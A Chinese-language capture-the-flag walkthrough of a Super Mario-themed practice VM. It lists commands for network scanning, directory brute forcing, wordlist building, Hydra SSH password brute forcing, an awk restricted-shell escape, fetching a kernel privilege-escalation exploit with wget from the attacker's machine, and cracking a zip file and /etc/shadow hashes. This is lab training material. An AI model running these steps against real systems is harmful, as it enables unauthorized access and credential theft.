練習靶機的好處可以讓你在接觸實操的時候不會手忙腳亂不知道該先怎么用,光知道理論永遠成為不了一個優秀的大牛.
靶機下載地址
https://pan.baidu.com/s/1wTPr1dr1hi1lzTFFu3u3Cg提取碼:778f導入靶機后用pingman掃描靶機ip
!/bin/bashif [ "$1" == "" ] thenecho "Usage:./pingman.sh [betwork]"echo "Example:./pingman.sh 192.168.1"elsefor ip in `seq 1 254`; do ping -c 1 $1.$ip | grep "64 bytes" | cut -d " " -f 4 | sed 's/.$//' & donefi此處ip
靶機:192.168.1.3
kali:192.168.1.5
第一步nmap掃
nmap -A -sS -Pn -p- 192.168.1.3
這里可以看到靶機只有ssh和apache兩個服務
進入192.168.1.3:8180可以看到一個nginx初始網頁
沒有什么可以看到的好東西
dirb目錄爆破
由於用dirb http://192.168.1.3:8180/也爆不出什么可用網頁於是用工具自帶的大字典進行爆破
locate dirb—–查看有關dirb的目錄位置
big.txt可以用這個找到
這里可以看到apache指定網頁的存放路徑
我們將自己的hosts文件中的加上域名
192.168.1.3 mario.supermariohost.local
這里是一個沒有馬里奧的游戲
由於個人原因,這里靶機ip為192.168.36.195
因為上面的東西也沒有什么特別有價值的所以我們用御劍再爆一次
dirbuster
這里發現了兩個新的網頁
command是一個查詢用戶名的界面,這個界面可以想想之前的ssh服務說不定是這個用戶名登錄的
luigi里面是一封信
…截圖太麻煩所以這里兩個頁面留給大家自己實踐去查看
這里不知道為什么在command.php中怎么也爆不出用戶名(可能是作者故意設置的一個坑)
字典生成
cewl mario.supermariohost.local:8180/luigi.php -w /root/user.txt
john --wordlist=user.txt --stdout --rules >pass.txt
有了字典之后我們就能進行ssh爆破了
hydra ssh爆破
hydra -L user.txt -P pass.txt 192.168.36.195 ssh -t 4 -V這個過程有點長…..
有了帳號密碼當然ssh連接看看呀
這里發現有些命令執行不了,管理員做了限制.在終端輸入?查看可以使用的命令有awk.好嘞,你等着!!!
awk權限繞過
awk 'BEGIN{system("/bin/bash")}'
成功繞過后我們查看內核版本信息,發現是3.13.0的老系統,回到kali找exp進行提權
靶機下載做好的提權腳本
wget 192.168.36.208/exp3.13
有了root權限后使用python切換shell
python -c 'import pty;pty.spawn("/bin/bash")'在/root下找到flag.zip,發現有密碼,繼續放到kali進行解密
zip解密
fcrackzip -D -p rockyou.txt -u /root/flag.zip
查看flag
這里作者最后讓我們把所以的密碼都明文解密出來
把/etc/shadow下的root mario luigi copy出來放到kali進行john解密
john --wordlist=rockyou.txt userpass.txt好了所有的內容都做完了,整理總結,最后密碼懶得發圖,交給大家自己實踐了,哈哈哈